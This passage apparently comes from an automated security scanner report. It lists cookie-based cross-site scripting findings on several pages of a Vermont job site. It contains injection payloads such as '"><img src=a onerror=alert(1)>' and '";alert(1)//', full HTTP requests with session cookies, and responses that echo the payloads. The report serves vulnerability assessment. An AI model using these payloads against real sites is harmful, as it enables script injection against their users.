User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en58b0b"><img%20src%3da%20onerror%3dalert(1)>574bc68bc7e8202f9; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:44 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en58b0b"><img src=a onerror=alert(1)>574bc68bc7e8202f9">
...[SNIP]...

3.206. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceb4"%3balert(1)//60cf3b24c05 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as bceb4";alert(1)//60cf3b24c05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=enbceb4"%3balert(1)//60cf3b24c05; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:26 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENBCEB4";ALERT(1)//60CF3B24C05\">
...[SNIP]...

3.207. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b001"%3balert(1)//6e8624b8e0ae7c17b was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 7b001";alert(1)//6e8624b8e0ae7c17b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en7b001"%3balert(1)//6e8624b8e0ae7c17b; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:45 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN7B001";ALERT(1)//6E8624B8E0AE7C17B\">
...[SNIP]...

3.208. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_login_fnc.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b71b2"><img%20src%3da%20onerror%3dalert(1)>aa3836d3e47 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b71b2"><img src=a onerror=alert(1)>aa3836d3e47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enb71b2"><img%20src%3da%20onerror%3dalert(1)>aa3836d3e47; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:21:00 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enb71b2"><img src=a onerror=alert(1)>aa3836d3e47">
...[SNIP]...

3.209. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_login_fnc.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93c3c"%3balert(1)//c80ab57b023 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 93c3c";alert(1)//c80ab57b023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en93c3c"%3balert(1)//c80ab57b023; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:21:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN93C3C";ALERT(1)//C80AB57B023\">
...[SNIP]...

3.210. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_offices_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e535"><img%20src%3da%20onerror%3dalert(1)>881020bcf9f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2e535"><img src=a onerror=alert(1)>881020bcf9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2e535"><img%20src%3da%20onerror%3dalert(1)>881020bcf9f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en2e535"><img src=a onerror=alert(1)>881020bcf9f">
...[SNIP]...

3.211. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_offices_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload affbc"%3balert(1)//53c2f941734 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as affbc";alert(1)//53c2f941734 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enaffbc"%3balert(1)//53c2f941734; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENAFFBC";ALERT(1)//53C2F941734\">
...[SNIP]...

3.212. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_protectyourself_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2b8"%3balert(1)//fa1bc80a5c3 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 9e2b8";alert(1)//fa1bc80a5c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en9e2b8"%3balert(1)//fa1bc80a5c3; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:20:11 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

